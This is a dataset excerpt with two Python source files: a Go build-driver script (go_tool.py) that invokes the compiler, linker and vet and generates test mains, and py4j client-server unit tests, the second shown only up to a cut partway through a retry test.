source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
go_tool.py | import argparse
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
return ['-trimpath', args.trimpath] if args.trimpath else []
def preprocess_cgo1(src_path, dst_path, source_root):
with open(src_path, 'r') as f:
content = f.read()
content = content.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root)
with open(dst_path, 'w') as f:
f.write(content)
def preprocess_args(args):
# Temporary work around for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = list(filter(lambda x: x not in cgo_srcs_set, args.srcs))
args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(toolchain_tool_root, 'compile')
args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
args.go_link = os.path.join(toolchain_tool_root, 'link')
args.go_asm = os.path.join(toolchain_tool_root, 'asm')
args.go_pack = os.path.join(toolchain_tool_root, 'pack')
args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
args.trimpath = None
if args.debug_root_map:
roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
replaces = []
for root in args.debug_root_map.split(';'):
src, dst = root.split('=', 1)
assert src in roots
replaces.append('{}=>{}'.format(roots[src], dst))
del roots[src]
assert len(replaces) > 0
args.trimpath = ';'.join(replaces)
args.build_root = os.path.normpath(args.build_root)
args.build_root_dir = args.build_root + os.path.sep
args.source_root = os.path.normpath(args.source_root)
args.source_root_dir = args.source_root + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
if args.cgo_peers:
args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
# add lexical oreder by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root_dir)
args.module_path = args.output_root[len(args.build_root_dir):]
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
assert args.asmhdr is None or args.word == 'go'
srcs = []
for f in args.srcs:
if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
srcs.append(path)
preprocess_cgo1(f, path, args.source_root)
else:
srcs.append(f)
args.srcs = srcs
classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
v1 = tuple(str(int(x)).zfill(8) for x in version1.split('.'))
v2 = tuple(str(int(x)).zfill(8) for x in version2.split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
def call(cmd, cwd, env=None):
# print >>sys.stderr, ' '.join(cmd)
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = list(filter(lambda x: x.endswith('.go'), srcs))
args.asm_srcs = list(filter(lambda x: x.endswith('.s'), srcs))
args.objects = list(filter(lambda x: x.endswith('.o') or x.endswith('.obj'), srcs))
args.symabis = list(filter(lambda x: x.endswith('.symabis'), srcs))
args.sysos = list(filter(lambda x: x.endswith('.syso'), srcs))
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in import_map.items():
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in module_map.items():
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# print >>sys.stderr, content
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content)
return f.name
return None
def vet_info_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_info_ext)
def vet_report_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_report_ext)
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
# FIXME(snermolaev): it seems that adding import map for 'fake' package
# does't make any harm (it needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': list(filter(lambda x: x.endswith('.go'), args.go_srcs)),
'NonGoFiles': list(filter(lambda x: not x.endswith('.go'), args.go_srcs)),
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# print >>sys.stderr, json.dumps(data, indent=4)
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder(encoding='UTF-8').decode(json_report)
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in full_diags.iteritems():
for _, type_diags in module_diags.iteritems():
for diag in type_diags:
messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
report = '\n'.join(sorted(messages)).encode('UTF-8')
return report
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), filter(None, test_args_list), ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
# print >>sys.stderr, '>>>> [{}]'.format(' '.join(cmd))
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [
args.go_compile,
'-o',
args.output,
'-p',
import_path,
'-D',
'""',
'-goversion',
'go{}'.format(args.goversion)
]
cmd.extend(get_trimpath_args(args))
if is_std_module:
cmd.append('-std')
if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
cmd.append('-+')
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
if compare_versions('1.12', args.goversion) >= 0:
if args.symabis:
cmd += ['-symabis'] + args.symabis
if compare_versions('1.13', args.goversion) >= 0:
pass
elif import_path in ('runtime', 'runtime/internal/atomic'):
cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
if import_path == 'runtime' or import_path.startswith('runtime/'):
cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
else:
cmd.extend(args.compile_flags)
if any(map(lambda x: x in ('-race', '-shared'), args.compile_flags)):
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
raise self.exc_info[0], self.exc_info[1], self.exc_info[2]
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm]
cmd += get_trimpath_args(args)
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any(map(lambda x: x.startswith(build_info), compile_args.peers)):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
if args.mode in ('exe', 'test'):
cmd.append('-buildmode=exe')
elif args.mode == 'dll':
cmd.append('-buildmode=c-shared')
else:
assert False, 'Unexpected mode: {}'.format(args.mode)
cmd.append('-extld={}'.format(args.extld))
extldflags = []
if args.extldflags is not None:
filter_musl = None
if args.musl:
cmd.append('-linkmode=external')
extldflags.append('-static')
filter_musl = lambda x: not x in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
extldflags += list(filter(filter_musl, args.extldflags))
cgo_peers = []
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
cgo_peers.append('-Wl,--start-group')
cgo_peers.extend(os.path.join(args.build_root, x) for x in args.cgo_peers)
if is_group:
cgo_peers.append('-Wl,--end-group')
try:
index = extldflags.index('--cgo-peers')
extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
except ValueError:
extldflags.extend(cgo_peers)
if len(extldflags) > 0:
cmd.append('-extldflags={}'.format(' '.join(extldflags)))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def filter_out_skip_tests(tests, skip_tests):
skip_set = set()
star_skip_set = set()
for t in skip_tests:
work_set = star_skip_set if '*' in t else skip_set
work_set.add(t)
re_star_tests = None
if len(star_skip_set) > 0:
re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
return [x for x in tests if not (x in skip_tests or re_star_tests and re_star_tests.match(x))]
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = filter(lambda x: len(x) > 0, (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n'))
if args.skip_tests:
tests = filter_out_skip_tests(tests, args.skip_tests)
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = filter(lambda x: len(x) > 0, (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n'))
if args.skip_tests:
xtests = filter_out_skip_tests(xtests, args.skip_tests)
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
elif test_lib_args:
lines.append(' _ "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
elif xtest_lib_args:
lines.append(' _ "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
for kind in ['Test', 'Benchmark', 'Example']:
lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
for test in list(filter(lambda x: x.startswith(kind), tests)):
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in list(filter(lambda x: x.startswith(kind), xtests)):
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)'
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# print >>sys.stderr, content
return content
def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = copy_args(args) if args.srcs else None
xtest_lib_args = copy_args(args) if args.xtest_srcs else None
ydx_file_name = None
xtest_ydx_file_name = None
need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
if need_append_ydx:
def find_ydx_file_name(name, flags):
for i, elem in enumerate(flags):
if elem.endswith(name):
return (i, elem)
assert False, 'Unreachable code'
idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name
if test_lib_args:
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if xtest_lib_args:
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
do_link_lib(xtest_lib_args)
if need_append_ydx:
with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
dst_file.write(src_file.read())
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
# it seems that we can do it unconditionally, but this kind
# of mangling doesn't really looks good to me and we leave it
# for pure GO_TEST module
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
# Support @response-file notation for windows to reduce cmd length
if sys.argv[1].startswith('@'):
with open(sys.argv[1][1:]) as afile:
args = afile.read().splitlines()
sys.argv[:] = [sys.argv[0]] + args + sys.argv[2:]
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++source-root', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++tools-root', default=None)
parser.add_argument('++output-root', required=True)
parser.add_argument('++toolchain-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++vet-info-ext', default=vet_info_ext)
parser.add_argument('++vet-report-ext', default=vet_report_ext)
parser.add_argument('++musl', action='store_true')
parser.add_argument('++skip-tests', nargs='*', default=None)
parser.add_argument('++ydx-file', default='')
parser.add_argument('++debug-root-map', default=None)
args = parser.parse_args()
preprocess_args(args)
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
vet_info_ext = args.vet_info_ext
vet_report_ext = args.vet_report_ext
try:
os.unlink(args.output)
except OSError:
pass
# We are going to support only 'lib', 'exe' and 'cgo' build modes currently
# and as a result we are going to generate only one build node per module
# (or program)
dispatch = {
'exe': do_link_exe,
'dll': do_link_exe,
'lib': do_link_lib,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
print >>sys.stderr, 'Unknown build mode [{}]...'.format(args.mode)
except subprocess.CalledProcessError as e:
print >>sys.stderr, '{} returned non-zero exit code {}. stop.'.format(' '.join(e.cmd), e.returncode)
print >>sys.stderr, e.output
exit_code = e.returncode
except Exception as e:
print >>sys.stderr, "Unhandled exception [{}]...".format(str(e))
sys.exit(exit_code)
|
client_server_test.py | # -*- coding: UTF-8 -*-
from contextlib import contextmanager
import gc
from multiprocessing import Process
import subprocess
import threading
import unittest
from py4j.clientserver import (
ClientServer, JavaParameters, PythonParameters)
from py4j.java_gateway import GatewayConnectionGuard, is_instance_of, \
GatewayParameters, DEFAULT_PORT, DEFAULT_PYTHON_PROXY_PORT
from py4j.protocol import Py4JError, Py4JJavaError, smart_decode
from py4j.tests.java_callback_test import IHelloImpl
from py4j.tests.java_gateway_test import (
PY4J_JAVA_PATH, check_connection, sleep, WaitOperator)
from py4j.tests.py4j_callback_recursive_example import (
PythonPing, HelloState)
def start_clientserver_example_server():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.examples.SingleThreadApplication"])
def start_short_timeout_clientserver_example_server():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.examples.SingleThreadApplication$"
"SingleThreadShortTimeoutApplication"])
def start_java_clientserver_example_server():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.examples.SingleThreadClientApplication"])
def start_java_clientserver_gc_example_server():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.examples.SingleThreadClientGCApplication"])
def start_clientserver_example_app_process(
start_java_client=False, start_short_timeout=False,
start_gc_test=False):
# XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
if start_short_timeout:
p = Process(target=start_short_timeout_clientserver_example_server)
elif start_java_client:
p = Process(target=start_java_clientserver_example_server)
elif start_gc_test:
p = Process(target=start_java_clientserver_gc_example_server)
else:
p = Process(target=start_clientserver_example_server)
p.start()
sleep()
check_connection()
return p
@contextmanager
def clientserver_example_app_process(
start_java_client=False, start_short_timeout=False,
start_gc_test=False, join=True):
p = start_clientserver_example_app_process(
start_java_client, start_short_timeout, start_gc_test)
try:
yield p
finally:
if join:
p.join()
def start_java_multi_client_server_app():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.examples.MultiClientServer"])
def start_java_multi_client_server_app_process():
# XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
p = Process(target=start_java_multi_client_server_app)
p.start()
sleep()
# test both gateways...
check_connection(
gateway_parameters=GatewayParameters(port=DEFAULT_PORT))
check_connection(
gateway_parameters=GatewayParameters(port=DEFAULT_PORT + 2))
return p
@contextmanager
def java_multi_client_server_app_process():
p = start_java_multi_client_server_app_process()
try:
yield p
finally:
p.join()
class HelloObjects(object):
def __init__(self):
self.calls = 0
def sendObject(self, o1, o2):
# make a cycle between the objects,
# this ensure the objects are not collected as
# soon as the functions return and require
# a full gc to be cleared
o1.cycle = o2
o2.cycle = o1
self.calls += 1
return ""
class Java:
implements = ["py4j.examples.IHelloObject"]
class GarbageCollectionTest(unittest.TestCase):
def testSendObjects(self):
"""This test receives 1000 calls creating object cycles.
Typically, the garbage collector will starts in the middle of
Py4J connection code, which will create an error if the garbage
collection is done on the same thread.
"""
hello = HelloObjects()
client_server = ClientServer(
JavaParameters(), PythonParameters(), hello)
with clientserver_example_app_process(
start_gc_test=True, join=False) as p:
p.join()
client_server.shutdown()
self.assertEquals(1000, hello.calls)
class RetryTest(unittest.TestCase):
def testBadRetry(self):
"""Should not retry from Python to Java.
Python calls a long Java method. The call goes through, but the
response takes a long time to get back.
If there is a bug, Python will fail on read and retry (sending the same
call twice).
If there is no bug, Python will fail on read and raise an Exception.
"""
client_server = ClientServer(
JavaParameters(read_timeout=0.250), PythonParameters())
with clientserver_example_app_process():
try:
example = client_server.jvm.py4j.examples.ExampleClass()
value = example.sleepFirstTimeOnly(500)
self.fail(
"Should never retry once the first command went through."
"number of calls made: {0}".format(value))
except Py4JError:
self.assertTrue(True)
finally:
client_server.shutdown()
def testGoodRetry(self):
"""Should retry from Python to Java.
Python calls Java twice in a row, then waits, then calls again.
Java fails when it does not receive calls quickly.
If there is a bug, Python will fail on the third call because the Java
connection was closed and it did not retry.
If there is a bug, Python might not fail because Java did not close the
connection on timeout. The connection used to call Java will be the
same one for all calls (and an assertion will fail).
If there is no bug, Python will call Java twice with the same
connection. On the third call, the write will fail, and a new
connection will be created.
"""
client_server = ClientServer(
JavaParameters(), PythonParameters())
connections = client_server._gateway_client.deque
with clientserver_example_app_process(False, True):
try:
# Call #1
client_server.jvm.System.currentTimeMillis()
str_connection = str(connections[0])
# Call #2
client_server.jvm.System.currentTimeMillis()
self.assertEqual(1, len(connections))
str_connection2 = str(connections[0])
self.assertEqual(str_connection, str_connection2)
sleep(0.5)
client_server.jvm.System.currentTimeMillis()
self.assertEqual(1, len(connections))
str_connection3 = str(connections[0])
# A new connection was automatically created.
self.assertNotEqual(str_connection, str_connection3)
except Py4JError:
self.fail("Should retry automatically by default.")
finally:
client_server.shutdown()
def testBadRetryFromJava(self):
"""Should not retry from Java to Python.
Similar use case as testBadRetry, but from Java: Java calls a long
Python operation.
If there is a bug, Java will call Python, then read will fail, then it
will call Python again.
If there is no bug, Java will call Python, read will fail, then Java
will raise an Exception that will be received as a Py4JError on the
Python side.
"""
client_server = ClientServer(
JavaParameters(), PythonParameters())
with clientserver_example_app_process(False, True):
try:
operator = WaitOperator(0.5)
opExample = client_server.jvm.py4j.examples.OperatorExample()
opExample.randomBinaryOperator(operator)
self.fail(
"Should never retry once the first command went through."
" number of calls made: {0}".format(operator.callCount))
except Py4JError:
# XXX This occurs when WaitOperator tries to send a response to
# the Java side (this is slightly different then the
# GatewayServer equivalent where the Py4JError occurs on the
# clientserver, but the Java side can still send back an
# exception to the JavaGateway).
self.assertTrue(True)
finally:
client_server.shutdown()
def testGoodRetryFromJava(self):
"""Should retry from Java to Python.
Similar use case as testGoodRetry, but from Java: Python calls Java,
which calls Python back. Then Java waits for a while and calls Python
again.
Because Python Server has been waiting for too much time, the
receiving socket has closed so the call from Java to Python will fail
on send, and Java must retry by creating a new connection
(ClientServerConnection).
Because ClientServer reuses the same connection in each thread, we must
launch a new thread on the Java side to correctly test the Python
Server.
"""
client_server = ClientServer(
JavaParameters(), PythonParameters(read_timeout=0.250))
with clientserver_example_app_process():
try:
operator = WaitOperator(0)
